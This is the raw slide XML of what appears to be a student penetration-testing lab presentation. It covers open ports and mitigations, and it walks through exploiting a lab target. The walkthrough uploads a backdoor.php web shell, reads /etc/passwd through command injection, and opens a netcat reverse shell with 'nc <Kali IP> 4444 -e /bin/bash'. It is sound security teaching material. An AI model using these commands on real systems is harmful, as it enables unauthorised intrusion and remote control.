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5"/>
    <p:sldMasterId id="2147483783" r:id="rId6"/>
    <p:sldMasterId id="2147483784" r:id="rId7"/>
    <p:sldMasterId id="21474837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13716000" cx="24377650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"/>
      <p:regular r:id="rId68"/>
      <p:bold r:id="rId69"/>
      <p:italic r:id="rId70"/>
      <p:boldItalic r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId72"/>
      <p:boldItalic r:id="rId73"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId74"/>
      <p:bold r:id="rId75"/>
      <p:italic r:id="rId76"/>
      <p:boldItalic r:id="rId77"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Caveat"/>
      <p:regular r:id="rId78"/>
      <p:bold r:id="rId79"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata"/>
      <p:regular r:id="rId80"/>
      <p:bold r:id="rId81"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Pacifico"/>
      <p:regular r:id="rId82"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId83"/>
      <p:bold r:id="rId84"/>
      <p:italic r:id="rId85"/>
      <p:boldItalic r:id="rId86"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue"/>
      <p:regular r:id="rId87"/>
      <p:bold r:id="rId88"/>
      <p:italic r:id="rId89"/>
      <p:boldItalic r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId91"/>
      <p:bold r:id="rId92"/>
      <p:italic r:id="rId93"/>
      <p:boldItalic r:id="rId94"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Amatic SC"/>
      <p:regular r:id="rId95"/>
      <p:bold r:id="rId96"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins"/>
      <p:regular r:id="rId97"/>
      <p:bold r:id="rId98"/>
      <p:italic r:id="rId99"/>
      <p:boldItalic r:id="rId100"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light"/>
      <p:regular r:id="rId101"/>
      <p:bold r:id="rId102"/>
      <p:italic r:id="rId103"/>
      <p:boldItalic r:id="rId104"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins Medium"/>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606">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="7989">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="750">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="78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491178-DE92-48F7-B58E-0A37C71B41A1}">
  <a:tblStyle styleId="{0D491178-DE92-48F7-B58E-0A37C71B41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06"/>
        <p:guide pos="7989" orient="horz"/>
        <p:guide pos="750"/>
        <p:guide pos="78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PoppinsMedium-italic.fntdata"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-bold.fntdata"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-regular.fntdata"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-boldItalic.fntdata"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-bold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LatoLight-italic.fntdata"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-bold.fntdata"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-regular.fntdata"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-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AmaticSC-regular.fntdata"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-regular.fntdata"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AmaticSC-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-italic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-bold.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Roboto-regular.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/HelveticaNeue-boldItalic.fntdata"/><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RobotoLight-bold.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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Inconsolata-regular.fntdata"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Pacifico-regular.fntdata"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-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Black-boldItalic.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Caveat-bold.fntdata"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Caveat-regular.fntdata"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-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font" Target="fonts/RobotoThin-regular.fntdata"/><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font" Target="fonts/RobotoThin-bold.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pguard.com/blog/computer-worm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.upguard.com/blog/wannacry" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.upguard.com/blog/ransomware" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.upguard.com/blog/zero-day"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192.168.1.115/backdoor.php?cmd=cat%20/etc/passwd"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b10f3296a6_2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b10f3296a6_2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8bd883d690_5_514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8bd883d690_5_5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We used the provided script, exploit.sh, to exploit this vulnerability by opening an Ncat connection to our Kali VM.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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Edit the line at the top of the script that sets the TARGET variable. Set it equal to the IP address of Target 2.</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Run the script. It uploads a file called backdoor.php to the target server. This file can be used to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>command injection attacks</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b10f3296a6_2_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b10f3296a6_2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1" marL="9144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Navigate to: http://&lt;Target 2 URL&gt;/backdoor.php?cmd=&lt;CMD&gt;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allows you to run bash commands on Target 2.</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For example, try: http://&lt;Target 2 URL&gt;/backdoor.php?cmd=cat%20/etc/passwd</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Next, use the backdoor to open a shell session on the target.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On your </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> VM, start a netcat listener: nc -lnvp 4444</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 the browser, use the backdoor to run: nc &lt;Kali IP&gt; 4444 -e /bin/bash. For example, your query string will look like cmd=nc%20&lt;Kali IP&gt;%204444%20-e%20/bin/bash.</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Using the shell you've opened on Target 2, find a flag in /var/www.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8" name="Google Shape;2358;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a859f62071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a859f62071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8bd883d690_5_51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8bd883d690_5_5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a8fe11deed_3_4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a8fe11deed_3_4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9" name="Google Shape;2529;ga8fe11deed_3_48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a8fe11deed_3_490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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_492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a8fe11deed_3_4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a8fe11deed_3_493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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_496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a8fe11deed_3_49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a8fe11deed_3_496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a8fe11deed_3_49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a8fe11deed_3_497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a8fe11deed_3_49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a8fe11deed_3_497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a8fe11deed_3_49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a8fe11deed_3_498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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_49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a8fe11deed_3_500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a8fe11deed_3_50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a8fe11deed_3_50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a8fe11deed_3_50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a8fe11deed_3_50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a8fe11deed_3_50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a8fe11deed_0_22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a8fe11deed_0_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a8fe11deed_0_2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a8fe11deed_0_25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7" name="Google Shape;2677;ga8fe11deed_0_25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a8fe11deed_3_73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a8fe11deed_3_7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a8fe11deed_0_257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a8fe11deed_0_25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ssh -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100"/>
              <a:t> brute force the password (but we just guessed it it was so easy) and ssh in</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>rcpbind - </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1E1E1E"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="1E1E1E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>Portmappers  are also known as rpcbind which always listens on tcp and udp 111, and is used to map other RPC services to their corresponding port number on the server. When a remote host makes an RPC call to that server, it first consults with portmap to determine where the RPC server is listening.  </a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="1E1E1E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1E1E1E"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="1E1E1E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>This makes it a good candidate for DDoS attacks</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="1E1E1E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1E1E1E"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Georgia"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="1E1E1E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F9F9F9"/>
                </a:highlight>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:rPr>
              <a:t>For Mitigation:  "If a firewall is not already in use, the easiest way to prevent undesired public access to this service is to whitelist hosts which require communication with portmapper on your server (e.g., NFS clients) to the hosts.allow file, and to deny ALL: ALL in your hosts.deny file for the portmap service.</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="1E1E1E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="1E1E1E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="1E1E1E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Netbios-ssn port used for sharing files.  </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Netbios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> is a protocol to connect two computers to transmit heavy data traffic. It is mostly used for printer and file services over a network. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The most dangerous open ports are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>wormable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ports, like the one that the SMB protocol uses, which are open by default in some operating systems. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="4A507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4A5078"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Early versions of the SMB protocol were exploited during the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ransomware attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> through a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>zero-day exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="4A5078"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> called EternalBlue.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="4A507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4A5078"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>is a Low </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> vulnerability that is one of the most frequently found on networks around the world. This issue has been around since the 90’s. </a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="1E1E1E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F9F9F9"/>
              </a:highlight>
              <a:latin typeface="Georgia"/>
              <a:ea typeface="Georgia"/>
              <a:cs typeface="Georgia"/>
              <a:sym typeface="Georgi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a8fe11deed_0_2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a8fe11deed_0_25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3" name="Google Shape;2703;ga8fe11deed_0_25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a8fe11deed_0_25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a8fe11deed_0_25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We used the provided script, exploit.sh, to exploit this vulnerability by opening an Ncat connection to our Kali VM.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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Edit the line at the top of the script that sets the TARGET variable. Set it equal to the IP address of Target 2.</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Run the script. It uploads a file called backdoor.php to the target server. This file can be used to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>command injection attacks</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Navigate to: http://&lt;Target 2 URL&gt;/backdoor.php?cmd=&lt;CMD&gt;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allows you to run bash commands on Target 2.</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For example, try: http://&lt;Target 2 URL&gt;/backdoor.php?cmd=cat%20/etc/passwd</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Next, use the backdoor to open a shell session on the target.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On your </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> VM, start a netcat listener: nc -lnvp 4444</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 the browser, we used the backdoor to run: nc &lt;Kali IP&gt; 4444 -e /bin/bash. For example, your query string will look like cmd=nc%20&lt;Kali IP&gt;%204444%20-e%20/bin/bash.</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br>
              <a:rPr lang="en-US"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a8fe11deed_0_2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a8fe11deed_0_26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9" name="Google Shape;2719;ga8fe11deed_0_26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a8fe11deed_0_2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a8fe11deed_0_2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Use the provided script (exploit.sh) to exploit the vulnerability by opening an Ncat connection to your Kali VM, Edited exploit.sh to the IP address of Target 2 (192.168.1.115)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
